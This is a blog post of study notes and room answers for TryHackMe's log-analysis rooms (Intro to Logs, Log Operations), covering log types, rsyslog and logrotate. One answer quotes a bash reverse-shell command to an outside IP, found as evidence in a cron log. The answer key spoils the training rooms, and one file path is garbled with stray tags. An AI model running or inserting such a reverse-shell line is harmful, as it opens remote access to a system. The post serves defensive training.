We covered an introduction to logging where we discussed the logic of creating logs and why we create logs. Logs are created and generated to track performance, analyze security incidents and to establish a pattern from which future events can be predicted. Logs can be system logs, application logs, security logs, audit logs, server logs and database logs. The process of log management starts with collecting logs, storing them in a central location, parsing the logs and then analyzing using log analysis tools and SIEM as well. This was part of TryHackMe Intro to Logs walkthrough which is part of TryHackMe SOC Level 2 Track.

This post also covers the answers for TryHackMe Log Operations Room.

OSCP Study Notes

The Complete Practical Web Application Penetration Testing Course

Highlights

Log files are records of events committed to a file in a list format. They can include all sorts of information about events that happened at a particular time. Every device on the network creates log files, thus giving you a history of what’s been happening.
Logs typically contain five headed-up areas. They are:

  • Timestamp –the time of the event. 
  • Log level – how severe or important the event is.
  • Username– who caused the event.
  • Service or application – what caused the event.
  • Event description – what has happened.

Log file types

  • Event log –records information about the usage of network traffic and tracks login attempts, application events, and failed password attempts.
  • System log (or syslog) – records operating system events, including startup messages, system changes, shutdowns, and errors and warnings.
  • Server log – contains a record of activities in a text document related to a specific server over a specific period of time.
  • Change log – lists changes made to an application or file.
  • Availability log –tracks uptime, availability, and system performance.
  • Authorization and access log – lists who is accessing applications or files.
  • Resource log –provides information on connectivity issues and any capacity problems.
  • Application Logs Messages about specific applications, including status, errors, warnings, etc.
  • Audit Logs Activities related to operational procedures crucial for regulatory compliance.
  • Security Logs Security events such as logins, permissions changes, firewall activity, etc.
  • Network Logs Network traffic, connections, and other network-related events.
  • Database Logs Activities within a database system, such as queries and updates.
  • Web Server Logs Requests processed by a web server, including URLs, response codes, etc.

Room Answers | TryHackMe Intro to Logs

What is the name of your colleague who left a note on your Desktop?

Perry

What is the full path to the suggested log file for initial investigation?

T1566/var/log/gitlab/nginx/access.logT1566

Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?

web server log

Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?

combined

After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?

stansimon

What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?

10.10.10.101

Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?

/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”

Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?

24

Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?

hourly

Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters?

no date field

What is the process of standardising parsed data into a more easily readable and query-able format?

Normalisation

What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?

Enrichment

Room Answers | TryHackMe Log Operations

Which of the given log purposes would be suitable to measure the cost of using a service?

Operational

Which of the given log purposes would be suitable for investigating application logs for enhancement and stability? 

Debug

You are a consultant working for a growing startup. As a consultant, you participated in a log configuration planning session. The company you work for is working to get compliant to process payment information. The given question set is being discussed.

Which question’s answer can be “as much as mentioned in the PCI DSS requirements.”?

How much do you need to log

The session continues, and your teammates need your help; they will negotiate for logging budget and operation details. As a consultant, you must remind them of a vital point:

Which requirements are non-negotiable?

operational and security requirements

Your team is working on policies to decide which logs will be stored and which portion will be available for analysis.
Which of the given logging principles would be implemented and improved?

Archiving and Accessibility

Your team implemented a brand new API logging product. One of the team members has been tasked with collecting the logs generated by that new product. The team member reported continuous errors when transferring the logs to the review platform.
In this case, which of the given difficulties occurs?

Process and Archive

As a consultant, you are doing a comprehensive risk assessment and noticed that one of the development teams implemented a custom script to generate logs for an old system, which omits loggings at some phases.

What you would call this? (Mistake or Practice?)

Mistake

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles